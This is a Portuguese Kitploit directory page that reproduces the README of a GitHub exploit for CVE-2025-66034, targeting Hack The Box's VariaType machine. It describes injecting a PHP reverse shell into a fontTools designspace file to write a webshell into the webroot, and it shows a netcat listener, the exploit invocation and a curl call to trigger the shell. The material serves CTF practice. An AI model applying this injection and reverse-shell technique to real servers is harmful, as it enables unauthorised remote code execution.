Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-66034-htb-ctf | Kitploit
Ferramentas/GitHubGitHub/jwsly12/cve-2025-66034-htb-ctf
Geração de PayloadsExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e Educação
GitHubjwsly12/cve-2025-66034-htb-ctf

CVE-2025-66034-htb-ctf

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-66034-htb-ctf

Exploit do Gerador de Fontes Variáveis VariaType

Este repositório contém um exploit especializado para a máquina VariaType do Hack The Box. O exploit aproveita uma vulnerabilidade na forma como a biblioteca fontTools ou a aplicação web lida com arquivos XML .designspace e interpolação de metadados para alcançar Execução Remota de Código (RCE).

📝 Descrição

A vulnerabilidade existe no processo de geração de fontes. Ao criar um arquivo designspace malicioso, podemos injetar um payload de reverse shell PHP nos metadados da fonte (especificamente no campo <labelname>). Quando o servidor processa esses arquivos para gerar uma fonte variável, ele escreve a saída em um caminho definido pelo usuário, permitindo que coloquemos um shell .php na webroot.

🛠️ Funcionalidades

  • Geração Automatizada de Fontes: Cria fontes mestre source-light.ttf e source-regular.ttf válidas usando fontTools.
  • Injeção de XML: Gera um arquivo designspace malicioso com um payload PHP encapsulado em CDATA.
  • Path Traversal/Escrita Arbitrária de Arquivos: Tenta salvar a "fonte" resultante como um arquivo .php no diretório público.
  • Randomização: Gera nomes de shell únicos para evitar conflitos.

🚀 Requisitos

Você deve ter Python 3 instalado juntamente com as seguintes bibliotecas:

root@kitploit:~
pip install fontTools requests

💻 Uso

1. Inicie seu listener

Na sua máquina local (ou Pwnbox), inicie um listener Netcat:

root@kitploit:~
nc -lvnp 4444

2. Execute o exploit

Execute o script fornecendo seu IP da VPN do HTB e a porta do listener:

root@kitploit:~
python3 exploit.py --ip <YOUR_IP> --port 4444

3. Acione o shell

Se o upload retornar 200 OK (ou às vezes até 500 se o processamento ocorrer antes do erro), o script fornecerá o nome do arquivo. Acesse-o via curl ou seu navegador:

root@kitploit:~
curl http://portal.variatype.htb/shell_xxxxxx.php

⚙️ Argumentos

⚠️ Aviso Legal

Este script é destinado apenas para fins educacionais e testes de penetração autorizados. Acessar ou atacar alvos sem autorização prévia é ilegal.


Como usar este README:

  1. Salve o conteúdo acima como README.md na mesma pasta do seu script.
  2. Certifique-se de que seu script esteja nomeado como exploit.py ou atualize o nome do arquivo nos comandos acima.
Baixar ferramenta
ArgumentoDescriçãoPadrão
--ipSeu IP do listener (VPN)Obrigatório
--portSua porta do listenerObrigatório
--pathCaminho alvo para o shell/var/www/portal.variatype.htb/public
--urlO endpoint de uploadhttp://variatype.htb/tools/.../process